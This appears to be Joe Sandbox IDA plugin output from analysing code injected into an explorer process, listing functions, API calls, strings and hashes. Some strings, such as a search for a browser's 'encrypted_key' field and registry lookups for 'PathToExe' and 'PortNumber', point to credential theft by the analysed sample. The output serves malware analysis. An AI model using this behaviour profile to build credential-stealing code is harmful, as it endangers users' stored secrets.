Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: 9f15ffec0575f3f64ca5a177f224e000de35f3b676feb41a18e23b06cf7fba9d
Instruction ID: 258bc06122be11f93dfcbf14fdee882063fb7613fbafdb44ac8f1a427a6f287f
Opcode Fuzzy Hash: 9f15ffec0575f3f64ca5a177f224e000de35f3b676feb41a18e23b06cf7fba9d
Instruction Fuzzy Hash: 30318D31604311AFDB65AF25CC1986FBAA9FFC4360B04452CF855C72C1EE74C915CBA2

Function 0080A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alldiv.NTDLL(?,?,?), ref: 0080A6AD
_allmul.NTDLL(00000000,?,?), ref: 0080A6B6
SetEndOfFile.KERNELBASE(?), ref: 0080A6F3

Strings

winTruncate1, xrefs: 0080A6DF
winTruncate2, xrefs: 0080A717

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: File_alldiv_allmul
String ID: winTruncate1$winTruncate2
API String ID: 3568847005-470713972
Opcode ID: 207ffb89e1e7c29007028d62d1cf95dbf581de56c69cf24a0f3c3406db1183d9
Instruction ID: 6ddcbf54ad33976a0694eb4fbbb2b82e9185c0d0d8c286aed2c23369b444110c
Opcode Fuzzy Hash: 207ffb89e1e7c29007028d62d1cf95dbf581de56c69cf24a0f3c3406db1183d9
Instruction Fuzzy Hash: CF21AC76201200ABCB988E2DCC86E6777A9FF84311F15C169FD54DB296DA35DC00CBA2

Function 00804A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

wsprintfW.USER32 ref: 00804AA2
RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00804AC7
RegCloseKey.KERNELBASE(?), ref: 00804AD4

Strings

%s\%08x, xrefs: 00804A9C
Software, xrefs: 00804A95

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: 69378b56749ca1f828c17b133918e40e6eba4c55d3e805facbe797ae9908bde9
Instruction ID: 8a1db660c7767a3b238d7b5d316805bc425b15ef0b382c80e6c5d6b10eef4c69
Opcode Fuzzy Hash: 69378b56749ca1f828c17b133918e40e6eba4c55d3e805facbe797ae9908bde9
Instruction Fuzzy Hash: 5401F271A40108BFEB189F95DC8ADBF7BADFB41355F80016EFA05E3181EAB06E509661

Function 00804317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

_alloca_probe.NTDLL ref: 0080431C
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00804335
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00804363
RegCloseKey.ADVAPI32(?), ref: 008043C8

Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994

Part of subcall function 0080418A: wsprintfW.USER32 ref: 00804212

Part of subcall function 00801011: GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
Part of subcall function 00801011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 008043B9

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: 4c9684997a8280f7b574007940ac99aa2e58a43ab9938b56d10997de3fd96cdd
Instruction ID: 6dfb6c6ca58c19f4a4d5bff3613fe3edaef3810e71f75a7a57835a4b5d8ac175
Opcode Fuzzy Hash: 4c9684997a8280f7b574007940ac99aa2e58a43ab9938b56d10997de3fd96cdd
Instruction Fuzzy Hash: 67119DB1104201AFE7559B20CC49DBBB7ECFB88354F004A2EB989D2190EB749D488A62

Function 0080B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0080B8D5
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0080B96F

Strings

psow, xrefs: 0080BA95
winOpen, xrefs: 0080BA22

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen
API String ID: 2416746761-4101858489
Opcode ID: 657f29ad0a1f7e172d6136d75aa7dde9f3fb2e9528116b8e9c74fc76299a3573
Instruction ID: e8a6be5e0ea20162045c9772553eac76f2c76f35ac4a725bd7f5771da44ef354
Opcode Fuzzy Hash: 657f29ad0a1f7e172d6136d75aa7dde9f3fb2e9528116b8e9c74fc76299a3573
Instruction Fuzzy Hash: 66715871A057069FDB90DF28CC81B1ABBE0FF88324F144A29F964D72D1E774D9548B92

Function 00869247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000867000.00000040.80000000.00040000.00000000.sdmp, Offset: 00867000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_867000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d9120862952903f83a450c738e7142f4e95cb7b70daf0630348500ce152903
Instruction ID: 6d313518caf77c5d76ba111eae138a82214aae64b0af4a4756bc7ecf3510acf5
Opcode Fuzzy Hash: b5d9120862952903f83a450c738e7142f4e95cb7b70daf0630348500ce152903
Instruction Fuzzy Hash: 91A16B729143565BD7218F78CDC46A07BA8FB52324B2E06ADC5E1CB3C2EB70580BC755

Function 008019E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A1E
RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A3C
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A75
RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A98

Part of subcall function 00801011: GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
Part of subcall function 00801011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: 3d1187306d79bef9454e2c39d5e56c9160af669024289975bbe11b551d3d76a6
Instruction ID: 240b28260bbe54a30e6bfdf48b6f9bb0edbc4af4f616d4ccd87d6ccce4b0aca7
Opcode Fuzzy Hash: 3d1187306d79bef9454e2c39d5e56c9160af669024289975bbe11b551d3d76a6
Instruction Fuzzy Hash: BF21AD72306351AFEB648A218D48F3BB7E9FBC8769F000A2DF985D2180E624CD418622

Function 00801EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 00801ED5

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00801F0C
RegCloseKey.ADVAPI32(?), ref: 00801F98

Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00801F82

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: c4728dfa3212deafacc0739b55bf59068ca360cf118efa715bf59a00ab45fdc2
Instruction ID: f1d535f5d21e0bf9e493a8dc6f86956306890319dd2f09c80d546f08960635ae
Opcode Fuzzy Hash: c4728dfa3212deafacc0739b55bf59068ca360cf118efa715bf59a00ab45fdc2
Instruction Fuzzy Hash: CF217C71208301AFDB459B25CC48D2BBAEDFF88364F40492DF899D2190EF35C9159B22

Function 00801C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00803E1E,00000000,?,00803FA8), ref: 00801C46
GetFileSize.KERNEL32(00000000,00000000,00000000,?,00803FA8), ref: 00801C56
CloseHandle.KERNEL32(00000000,?,00803FA8), ref: 00801C91

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00803FA8), ref: 00801C76

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 67cd949d3ba6dabbb685df347d58fd5ca3336572a0e179925966cf71aa853329
Instruction ID: 67dfa92ca5687e2256edd7b48ffcd285559447f5777a81ce921b7b36f29fecc8
Opcode Fuzzy Hash: 67cd949d3ba6dabbb685df347d58fd5ca3336572a0e179925966cf71aa853329
Instruction Fuzzy Hash: 63F0F431200718BBD6601B29DC8CE7B7A5CFB427F6F110318F505D31D0EB169C114171

Function 00802FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00803E30,00000000,00000000,?,00803FA8), ref: 00802FC1
lstrlen.KERNEL32("encrypted_key":",?,00803FA8), ref: 00802FCE
StrStrIA.SHLWAPI("encrypted_key":",0085692C,?,00803FA8), ref: 00802FDD

Part of subcall function 0080190B: lstrlen.KERNEL32(?,?,?,?,00000000,00802783), ref: 0080192B
Part of subcall function 0080190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00802783), ref: 00801930
Part of subcall function 0080190B: lstrcat.KERNEL32(00000000,?), ref: 00801946
Part of subcall function 0080190B: lstrcat.KERNEL32(00000000,00000000), ref: 0080194A

Strings

"encrypted_key":", xrefs: 00802FBA, 00802FBF, 00802FCD, 00802FDC

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: e45d8f7b6e97004d1f960e168245a3a458d20876c1b7b270efdb8acfdbf0a988
Instruction ID: 8170825c69fcb3c4a8563cd8275dfef1733bd26b787404bcda586ea7f06fa390
Opcode Fuzzy Hash: e45d8f7b6e97004d1f960e168245a3a458d20876c1b7b270efdb8acfdbf0a988
Instruction Fuzzy Hash: 4CE02B22745B351FC7F26BB51C488577E1CFE026523880064F601D3152FE958805C2A0

Function 0080BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0080BB40

Strings

winDelete, xrefs: 0080BB6A

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID: winDelete
API String ID: 3188754299-3936022152
Opcode ID: 3e803d40393ce7e2c2e45eaa15409980280bc3f2ee1c85caa2355fe82c59fc01
Instruction ID: 5ea4dddc158f1fec6ad502ed20f4bfcc599c2d2327c8ca0a85c75a6730a9758f
Opcode Fuzzy Hash: 3e803d40393ce7e2c2e45eaa15409980280bc3f2ee1c85caa2355fe82c59fc01
Instruction Fuzzy Hash: 2E11AD31B00208EBDB91ABA98C6697D7775FF91771F244125E812E72C9EB308D029792

Function 00802EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00801011: GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
Part of subcall function 00801011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00802EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00802F54
RegCloseKey.KERNELBASE(?), ref: 00802F62

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: a9d15d285dddfe8b2153919f866b8aa0a3d7dbe88d53a5c02ed76ff24a2c3735
Instruction ID: 6f1e36f00550b913f5bc3685f384833cdee73c180c2b55fec43e115496b9d7bb
Opcode Fuzzy Hash: a9d15d285dddfe8b2153919f866b8aa0a3d7dbe88d53a5c02ed76ff24a2c3735
Instruction Fuzzy Hash: 7E018F31204251AFCA559B25DC0896FBBA9FFC43A1F00442DF949D21D1DE358855EBA2

Function 00804B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00804B74
CoUninitialize.COMBASE ref: 00804B83
ExitProcess.KERNEL32 ref: 00804B8B

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: 678b8df6f6318a2cc11b4998b082baba99a8c63cdc3792decea8e81b5dc29021
Instruction ID: 2ad1fdfb90b204c78df6a5acc6eec09126e3f167a120d8a1bb1a98c98e7e8457
Opcode Fuzzy Hash: 678b8df6f6318a2cc11b4998b082baba99a8c63cdc3792decea8e81b5dc29021
Instruction Fuzzy Hash: 08C04C703C43008BE6D02BE05C0D7193614FF00713F405004F309C60D1EA5444108623

Function 00809FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00809FF8

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0080A00E

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: 377d75548fc30d257fcf2c9e16c212d06f4118f23ff5c504d51a0f8b25a76d2d
Instruction ID: 031469371a7da70787e159e241ef6a2c90d390608331c51ab338e32f8b9b4dc4
Opcode Fuzzy Hash: 377d75548fc30d257fcf2c9e16c212d06f4118f23ff5c504d51a0f8b25a76d2d
Instruction Fuzzy Hash: 94F02B72704746FAE7701A94EC88F67679CFB94B8AF154819F985D22C2EAB1AC008331

Function 00801AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00802E83,PathToExe,00000000,00000000), ref: 00801B16

Part of subcall function 00801011: GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
Part of subcall function 00801011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027

Part of subcall function 008019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A1E
Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A3C
Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A75
Part of subcall function 008019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A98

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00801B40

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: a37e7ebdb02b6e5139b4c63c9e6d1f9af9138429a2a01fc635d870305bbfa10b
Instruction ID: cddcfd992e03c520e5feb65d14fb740d2b7a8aa449740866be5b9a505dfdf101
Opcode Fuzzy Hash: a37e7ebdb02b6e5139b4c63c9e6d1f9af9138429a2a01fc635d870305bbfa10b
Instruction Fuzzy Hash: 93F02432700B4827DE512A2ACC9CE373A8EFBD23B77070029F559C3382EE166C405265

Function 0080A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0080A35F

Strings

winSeekFile, xrefs: 0080A381

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: FilePointer
String ID: winSeekFile
API String ID: 973152223-3168307952
Opcode ID: ea1960bab4c38a36d144ff0d58e0b18399b46f4e5bbf3bd83a87a8b97974d361
Instruction ID: 2e03af08b20c263e2928e7a9f0d7efc837ac86695bc5b9719cc61fdb4eb59f6d
Opcode Fuzzy Hash: ea1960bab4c38a36d144ff0d58e0b18399b46f4e5bbf3bd83a87a8b97974d361
Instruction Fuzzy Hash: 22F0BE30615304AFEB569F64DC059BB77AAFB44321F15C369F862DA3D0EA70DD0096A2

Function 00809EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(04F50000,00000000,?), ref: 00809EB5

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00809ECD

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: 9ab2b3de27c5e182abba40000de246fc0cc7182cfc645fe5310205e9b464d8bf
Instruction ID: 18455bc9379318dbb956e2a7086321b0c4261d25d2e8c40e90d5c9c53d5eb8f0
Opcode Fuzzy Hash: 9ab2b3de27c5e182abba40000de246fc0cc7182cfc645fe5310205e9b464d8bf
Instruction Fuzzy Hash: 75E0CD33A046107BC5131784AC05F1F7769FB94F51F064055F940D23A1C6B49C01C7A2

Function 00809EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(04F50000,00000000,?), ref: 00809EF8

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 00809F0E

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: 91cd98b367fd7baa781b1cde857cb3ddb52338dbbf58f2a7e7ebbdd24c262e61
Instruction ID: 474d3262c712f6600e5d951f80988a426a083af83a047c47dc6ed99bb75198a4
Opcode Fuzzy Hash: 91cd98b367fd7baa781b1cde857cb3ddb52338dbbf58f2a7e7ebbdd24c262e61
Instruction Fuzzy Hash: 7DD0C2322082027BC6011B94EC06F2B7739FB90B01F090008F100D11F7DBA46440AB62

Function 00801B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
CloseHandle.KERNELBASE(00000000), ref: 00801B8F

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 05763715d87bd0c3ab23f0155e109e06f6b14de45898c3cbae8ecd3c6a8c2b8d
Instruction ID: aebc450139c8a05e9c07e245d34161f6eb9cc4269ea946430b96c7bf77a72177
Opcode Fuzzy Hash: 05763715d87bd0c3ab23f0155e109e06f6b14de45898c3cbae8ecd3c6a8c2b8d
Instruction Fuzzy Hash: F8D0E265253A3062E9F626257C1CEA76E1CEF02BBAB440618B41DE60D0E328889782E0

Function 00801011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00801162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0080116F

GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: 39ba72a1223e1082b3fcb5dc1f613408aa444fad04efac3d3b17a55634ac1bba
Instruction ID: ceb79ccb24743dd0bbd77301fd99ff6e0a7fd2a94470e50670d62162b545ea6e
Opcode Fuzzy Hash: 39ba72a1223e1082b3fcb5dc1f613408aa444fad04efac3d3b17a55634ac1bba
Instruction Fuzzy Hash: 62C08C3104072092CEE027A43C0CBDA3B08FF09333F000041F501D3192DA698C4086A0

Function 00801000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 25102937b6241c740c3137fe64dde8268457757e13e7f9fc955d72428458cd09
Instruction ID: 3c894caa3750dc36d689ab875782bb7069e84ecf4ef51a5ff270110626467b15
Opcode Fuzzy Hash: 25102937b6241c740c3137fe64dde8268457757e13e7f9fc955d72428458cd09
Instruction Fuzzy Hash: D5A002755907049BDD4557B49E0DA2A3518FB44703F904544714587451F96854148721

Function 008012A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 008012B5

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: 371d506e2a68e66d76572428b1717cc96e619a28d6736bfe2e18abf69033bb8d
Instruction ID: e4926acb79874ad46098ae6a267356af06cc6b5f10eb5602a14961516db0378e
Opcode Fuzzy Hash: 371d506e2a68e66d76572428b1717cc96e619a28d6736bfe2e18abf69033bb8d
Instruction Fuzzy Hash: D311E6B1A01209AFDB50DFA5DD88ABEBBFCFB08351B504029F945E7240E7349D00CB60

Function 00801B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00802C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00801BAA

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 624898bdbd4d11d2e259ae60c58d80dcaa1e0f0737a3339386c2d9f460201639
Instruction ID: 8f7b387317ef1933f3ff40643a64d6702f94dbe907d1d15cae6d584f9e6c7273
Opcode Fuzzy Hash: 624898bdbd4d11d2e259ae60c58d80dcaa1e0f0737a3339386c2d9f460201639
Instruction Fuzzy Hash: 8BD0A933E0293082CEA416783C58892B280BA0077631A0BB4FC26F30D0F328CC8242C0

Function 00801677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

